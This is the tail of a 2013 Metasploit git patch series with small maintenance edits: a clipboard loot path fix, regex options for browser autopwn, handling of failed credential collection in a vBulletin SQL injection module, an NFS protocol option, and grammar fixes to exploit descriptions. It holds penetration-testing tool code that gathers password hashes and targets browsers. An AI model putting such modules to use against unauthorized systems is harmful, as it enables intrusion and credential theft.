--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/extapi/clipboard.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/extapi/clipboard.rb
@@ -107,7 +107,6 @@ class Console::CommandDispatcher::Extapi::Clipboard
 
       when :files
         if download_content
-          loot_dir = generate_loot_dir( true )
           print_line
           print_status( "Downloading Clipboard Files ..." )
           r[:data].each { |f|

From e5a92a18a563e8f3d5775379d1ba1b6cf141b2f8 Mon Sep 17 00:00:00 2001
From: Meatballs <eat_meatballs@hotmail.co.uk>
Date: Sun, 8 Dec 2013 19:01:03 +0000
Subject: [PATCH 212/217] and expand path

---
 .../ui/console/command_dispatcher/extapi/clipboard.rb            | 1 +
 1 file changed, 1 insertion(+)

diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/extapi/clipboard.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/extapi/clipboard.rb
index 6315700e07..8a95288ae1 100644
--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/extapi/clipboard.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/extapi/clipboard.rb
@@ -107,6 +107,7 @@ class Console::CommandDispatcher::Extapi::Clipboard
 
       when :files
         if download_content
+          loot_dir = ::File.expand_path( loot_dir )
           print_line
           print_status( "Downloading Clipboard Files ..." )
           r[:data].each { |f|

From cd66cca8a189a430df699f69ab350a527921b8a7 Mon Sep 17 00:00:00 2001
From: Joe Vennix <joev@metasploit.com>
Date: Sun, 8 Dec 2013 17:46:33 -0600
Subject: [PATCH 213/217] Make browser autopwn datastore use OptRegexp.

---
 modules/auxiliary/server/browser_autopwn.rb | 18 ++++++++++--------
 1 file changed, 10 insertions(+), 8 deletions(-)

diff --git a/modules/auxiliary/server/browser_autopwn.rb b/modules/auxiliary/server/browser_autopwn.rb
index a0fc5ea56e..8bbdeda05b 100644
--- a/modules/auxiliary/server/browser_autopwn.rb
+++ b/modules/auxiliary/server/browser_autopwn.rb
@@ -4,9 +4,9 @@
 ##
 
 # ideas:
-#	- add a loading page option so the user can specify arbitrary html to
-#	  insert all of the evil js and iframes into
-#	- caching is busted when different browsers come from the same IP
+# - add a loading page option so the user can specify arbitrary html to
+#   insert all of the evil js and iframes into
+# - caching is busted when different browsers come from the same IP
 
 require 'msf/core'
 require 'rex/exploitation/js/detect'
@@ -69,10 +69,10 @@ class Metasploit3 < Msf::Auxiliary
     register_advanced_options([
       OptString.new('AutoRunScript', [false, "A script to automatically on session creation.", '']),
       OptBool.new('AutoSystemInfo', [true, "Automatically capture system information on initialization.", true]),
-      OptString.new('MATCH', [false,
+      OptRegexp.new('MATCH', [false,
         'Only attempt to use exploits whose name matches this regex'
       ]),
-      OptString.new('EXCLUDE', [false,
+      OptRegexp.new('EXCLUDE', [false,
         'Only attempt to use exploits whose name DOES NOT match this regex'
       ]),
       OptBool.new('DEBUG', [false,
@@ -825,10 +825,12 @@ class Metasploit3 < Msf::Auxiliary
   # Yields each module that exports autopwn_info, filtering on MATCH and EXCLUDE options
   #
   def each_autopwn_module(&block)
-    m_regex = datastore["MATCH"]   ? %r{#{datastore["MATCH"]}}   : %r{}
-    e_regex = datastore["EXCLUDE"] ? %r{#{datastore["EXCLUDE"]}} : %r{^$}
+    m_regex = datastore["MATCH"]
+    e_regex = datastore["EXCLUDE"]
     framework.exploits.each_module do |name, mod|
-      if (mod.respond_to?("autopwn_opts") and name =~ m_regex and name !~ e_regex)
+      if mod.respond_to?("autopwn_opts") and
+         (m_regex.blank? or name =~ m_regex) and
+         (e_regex.blank? or name !~ e_regex)
         yield name, mod
       end
     end

From 92412279ae7e91acf6ba81d3b4955a5b55d5ed1a Mon Sep 17 00:00:00 2001
From: sinn3r <wei_chen@rapid7.com>
Date: Mon, 9 Dec 2013 02:11:46 -0600
Subject: [PATCH 214/217] Account for failed cred gathering attempts

Sometimes the SQL error doesn't contain the info we need.
---
 .../auxiliary/gather/vbulletin_vote_sqli.rb   | 31 ++++++++++++-------
 1 file changed, 19 insertions(+), 12 deletions(-)

diff --git a/modules/auxiliary/gather/vbulletin_vote_sqli.rb b/modules/auxiliary/gather/vbulletin_vote_sqli.rb
index 6c6cbbce21..1b083bd312 100644
--- a/modules/auxiliary/gather/vbulletin_vote_sqli.rb
+++ b/modules/auxiliary/gather/vbulletin_vote_sqli.rb
@@ -160,7 +160,7 @@ class Metasploit3 < Msf::Auxiliary
       return
     end
     count_users = data.to_i
-    print_good("#{peer} - #{count_users} users found")
+    print_good("#{peer} - #{count_users} users found. Collecting credentials...")
 
     users_table = Rex::Ui::Text::Table.new(
       'Header'  => 'vBulletin Users',
@@ -170,19 +170,26 @@ class Metasploit3 < Msf::Auxiliary
 
     for i in 0..count_users
       user = get_user_data(node_id, i)
-      report_auth_info({
-       :host => rhost,
-       :port => rport,
-       :user => user[0],
-       :pass => user[1],
-       :type => "hash",
-       :sname => (ssl ? "https" : "http"),
-       :proof => "salt: #{user[2]}" # Using proof to store the hash salt
-      })
-      users_table << user
+      unless user.join.empty?
+        report_auth_info({
+         :host => rhost,
+         :port => rport,
+         :user => user[0],
+         :pass => user[1],
+         :type => "hash",
+         :sname => (ssl ? "https" : "http"),
+         :proof => "salt: #{user[2]}" # Using proof to store the hash salt
+        })
+        users_table << user
+      end
     end
 
-    print_line(users_table.to_s)
+    if users_table.rows.length > 0
+      print_good("#{users_table.rows.length.to_s} credentials successfully collected")
+      print_line(users_table.to_s)
+    else
+      print_error("Unfortunately the module was unable to extract any credentials")
+    end
   end
 
 

From 291a52712e6748b6ddb2ba8c8ec24e34532823b8 Mon Sep 17 00:00:00 2001
From: Russell Sim <russell.sim@gmail.com>
Date: Mon, 9 Dec 2013 18:12:01 +1100
Subject: [PATCH 215/217] Allow the NFS protocol to be specified in the mount
 scanner

---
 modules/auxiliary/scanner/nfs/nfsmount.rb | 11 ++++++++---
 1 file changed, 8 insertions(+), 3 deletions(-)

diff --git a/modules/auxiliary/scanner/nfs/nfsmount.rb b/modules/auxiliary/scanner/nfs/nfsmount.rb
index 8bd512d2d6..e8bfcd059e 100644
--- a/modules/auxiliary/scanner/nfs/nfsmount.rb
+++ b/modules/auxiliary/scanner/nfs/nfsmount.rb
@@ -26,6 +26,11 @@ class Metasploit3 < Msf::Auxiliary
         ],
       'License'	=> MSF_LICENSE
     )
+
+    register_options([
+      OptEnum.new('PROTOCOL', [ true, 'The protocol to use', 'udp', ['udp', 'tcp']])
+    ])
+
   end
 
   def run_host(ip)
@@ -35,7 +40,7 @@ class Metasploit3 < Msf::Auxiliary
       progver		= 1
       procedure	= 5
 
-      sunrpc_create('udp', program, progver)
+      sunrpc_create(datastore['PROTOCOL'], program, progver)
       sunrpc_authnull()
       resp = sunrpc_call(procedure, "")
 
@@ -44,7 +49,7 @@ class Metasploit3 < Msf::Auxiliary
 
       report_service(
         :host  => ip,
-        :proto => 'udp',
+        :proto => datastore['PROTOCOL'],
         :port  => 2049,
         :name  => 'nfsd',
         :info  => "NFS Daemon #{program} v#{progver}"
@@ -64,7 +69,7 @@ class Metasploit3 < Msf::Auxiliary
         end
         report_note(
           :host => ip,
-          :proto => 'udp',
+          :proto => datastore['PROTOCOL'],
           :port => 2049,
           :type => 'nfs.exports',
           :data => { :exports => shares },

From e737b136cc437057fd4e0f4e27b36f3e98a76c09 Mon Sep 17 00:00:00 2001
From: Tod Beardsley <tod_beardsley@rapid7.com>
Date: Mon, 9 Dec 2013 14:00:11 -0600
Subject: [PATCH 216/217] Minor grammar/caps fixup for release

---
 modules/auxiliary/dos/http/rails_action_view.rb          | 6 +++---
 modules/auxiliary/gather/vbulletin_vote_sqli.rb          | 2 +-
 modules/exploits/unix/webapp/vbulletin_vote_sqli_exec.rb | 2 +-
 modules/post/windows/gather/forensics/browser_history.rb | 2 +-
 test/modules/post/test/extapi.rb                         | 2 +-
 5 files changed, 7 insertions(+), 7 deletions(-)

diff --git a/modules/auxiliary/dos/http/rails_action_view.rb b/modules/auxiliary/dos/http/rails_action_view.rb
index ecf9b0e61b..857e61fee4 100644
--- a/modules/auxiliary/dos/http/rails_action_view.rb
+++ b/modules/auxiliary/dos/http/rails_action_view.rb
@@ -11,12 +11,12 @@ class Metasploit3 < Msf::Auxiliary
 
   def initialize(info = {})
     super(update_info(info,
-      'Name'           => 'Ruby-on-Rails Action View MIME Memory Exhaustion',
+      'Name'           => 'Ruby on Rails Action View MIME Memory Exhaustion',
       'Description'    => %q{
         This module exploits a Denial of Service (DoS) condition in Action View that requires
-        a controller action. By sending a specially crafted content-type header to a rails
+        a controller action. By sending a specially crafted content-type header to a Rails
         application, it is possible for it to store the invalid MIME type, and may eventually
-        consumes all memory if enough invalid MIMEs are given.
+        consume all memory if enough invalid MIMEs are given.
 
         Versions 3.0.0 and other later versions are affected, fixed in 4.0.2 and 3.2.16.
       },
diff --git a/modules/auxiliary/gather/vbulletin_vote_sqli.rb b/modules/auxiliary/gather/vbulletin_vote_sqli.rb
index 1b083bd312..859283b1f8 100644
--- a/modules/auxiliary/gather/vbulletin_vote_sqli.rb
+++ b/modules/auxiliary/gather/vbulletin_vote_sqli.rb
@@ -14,7 +14,7 @@ class Metasploit3 < Msf::Auxiliary
     super(update_info(info,
       'Name'           => 'vBulletin Password Collector via nodeid SQL Injection',
       'Description'    => %q{
-        This module exploits a SQL Injection vulnerability found in vBulletin 5 that has been
+        This module exploits a SQL injection vulnerability found in vBulletin 5 that has been
         used in the wild since March 2013. This module can be used to extract the web application's
         usernames and hashes, which could be used to authenticate into the vBulletin admin control
         panel.
diff --git a/modules/exploits/unix/webapp/vbulletin_vote_sqli_exec.rb b/modules/exploits/unix/webapp/vbulletin_vote_sqli_exec.rb
index 998b4996b1..44ee6388a8 100644
--- a/modules/exploits/unix/webapp/vbulletin_vote_sqli_exec.rb
+++ b/modules/exploits/unix/webapp/vbulletin_vote_sqli_exec.rb
@@ -14,7 +14,7 @@ class Metasploit3 < Msf::Exploit::Remote
     super(update_info(info,
       'Name'           => 'vBulletin index.php/ajax/api/reputation/vote nodeid Parameter SQL Injection',
       'Description'    => %q{
-        This module exploits a SQL Injection vulnerability found in vBulletin 5 that has
+        This module exploits a SQL injection vulnerability found in vBulletin 5 that has
         been used in the wild since March 2013. This module uses the sqli to extract the
         web application's usernames and hashes. With the retrieved information tries to
         log into the admin control panel in order to deploy the PHP payload. This module
diff --git a/modules/post/windows/gather/forensics/browser_history.rb b/modules/post/windows/gather/forensics/browser_history.rb
index 6b27348f02..486fa3bb51 100644
--- a/modules/post/windows/gather/forensics/browser_history.rb
+++ b/modules/post/windows/gather/forensics/browser_history.rb
@@ -22,7 +22,7 @@ class Metasploit3 < Msf::Post
     super( update_info( info,
         'Name' => 'Windows Gather Skype, Firefox, and Chrome Artifacts',
         'Description' => %q{
-          Gathers Skype chat logs, Firefox history, and Chrome history data from the victim machine.
+          Gathers Skype chat logs, Firefox history, and Chrome history data from the target machine.
         },
         'License' => MSF_LICENSE,
         'Author' => [ 'Joshua Harper (@JonValt) <josh at radixtx dot com>' ],
diff --git a/test/modules/post/test/extapi.rb b/test/modules/post/test/extapi.rb
index 5ef93745dd..adca64609d 100644
--- a/test/modules/post/test/extapi.rb
+++ b/test/modules/post/test/extapi.rb
@@ -11,7 +11,7 @@ class Metasploit4 < Msf::Post
 
   def initialize(info={})
     super( update_info( info,
-        'Name'          => 'Testing Meterpreter ExtAPI Stuff',
+        'Name'          => 'Test Meterpreter ExtAPI Stuff',
         'Description'   => %q{ This module will test Windows Extended API methods },
         'License'       => MSF_LICENSE,
         'Author'        => [ 'Ben Campbell'],

From 1b3bc878f8af29a985697216062bc9e3b0dca0c3 Mon Sep 17 00:00:00 2001
From: Tod Beardsley <tod_beardsley@rapid7.com>
Date: Mon, 9 Dec 2013 21:32:03 -0600
Subject: [PATCH 217/217] Unscrew the author name

---
 modules/post/windows/gather/forensics/browser_history.rb | 4 +++-
 1 file changed, 3 insertions(+), 1 deletion(-)

diff --git a/modules/post/windows/gather/forensics/browser_history.rb b/modules/post/windows/gather/forensics/browser_history.rb
index 486fa3bb51..90bbcb1e36 100644
--- a/modules/post/windows/gather/forensics/browser_history.rb
+++ b/modules/post/windows/gather/forensics/browser_history.rb
@@ -25,7 +25,9 @@ class Metasploit3 < Msf::Post
           Gathers Skype chat logs, Firefox history, and Chrome history data from the target machine.
         },
         'License' => MSF_LICENSE,
-        'Author' => [ 'Joshua Harper (@JonValt) <josh at radixtx dot com>' ],
+        'Author' => [
+          'Joshua Harper <josh[at]radixtx.com>' # @JonValt
+        ],
         'Platform' => %w{ win },
         'SessionTypes' => [ 'meterpreter' ]
       ))